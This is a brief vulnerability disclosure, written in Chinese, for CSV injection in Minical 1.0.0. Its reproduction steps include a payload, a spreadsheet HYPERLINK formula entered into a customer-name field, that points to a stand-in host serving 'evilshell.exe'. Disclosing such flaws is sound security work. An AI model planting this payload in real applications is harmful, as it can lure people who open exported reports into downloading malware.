Minical 1.0.0 存在 CSV 注入漏洞。
厂商: https://github.com/minical/minical
演示应用: https://demo.minical.io/
步骤 1:导航到会计模块,并点击“创建新客户”。

步骤 2:在“名称”字段中输入有效载荷,然后点击“创建”。
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


步骤 3:点击“下载 CSV 报告”,并观察有效载荷被渲染。
